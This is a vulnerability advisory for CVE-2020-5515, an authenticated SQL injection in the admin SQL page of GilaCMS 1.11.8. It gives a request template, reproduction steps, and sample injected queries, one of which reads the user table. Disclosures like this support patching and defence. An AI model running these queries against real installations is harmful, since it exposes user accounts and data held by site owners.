CVE-2020-5515: GilaCMS 1.11.8 – ‘/admin/sql?query=’ SQL Injection

Skip to content

Product Owner: GilaCMS

Application Name: GilaCMS 1.11.8

CVE ID: CVE-2020-5515

Type: Installable/Customer-Controlled Application

Application Release Date: 4th December,2019

Severity: High

Authentication: Required

Complexity: Easy

Vulnerability Name: SQL Injection in ‘/admin/sql?query=’

Vulnerability Explanation: SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.

Verified In:
Firefox 71.0 (64-bit)
Windows 10
Hosted using XAMPP v3.2.4

Request:
GET /gilacms/admin/sql?query={INJECTION_POINT} HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: GSESSIONID=1za7iusvgawzjs936iegtmmtwfghbbp6ectnugwb0clvc0z37u
Upgrade-Insecure-Requests: 1

Steps to Reproduce:
1. Login to the GilaCMS application as admin.
2. Visit the following page: http://localhost/gilacms/admin/sql

3. Click on ‘Show Tables’. It takes us to http://localhost/gilacms/admin/sql?query=SHOW%20TABLES

4. The ‘query’ parameter is vulnerable to SQL injection (Inline Queries)
http://localhost/gilacms/admin/sql?query=SELECT VERSION(),USER()

http://localhost/gilacms/admin/sql?query=SELECT * FROM user

Vulnerable Code:
The ‘query’ parameter sent in the GET request (http://localhost/gilacms/admin/sql) is vulnerable to SQL Injection.

Reference:
Website: https://gilacms.com/
GitHub Repository: https://github.com/GilaCMS/gila
Download Version: https://github.com/GilaCMS/gila/releases/tag/1.11.8

Post navigation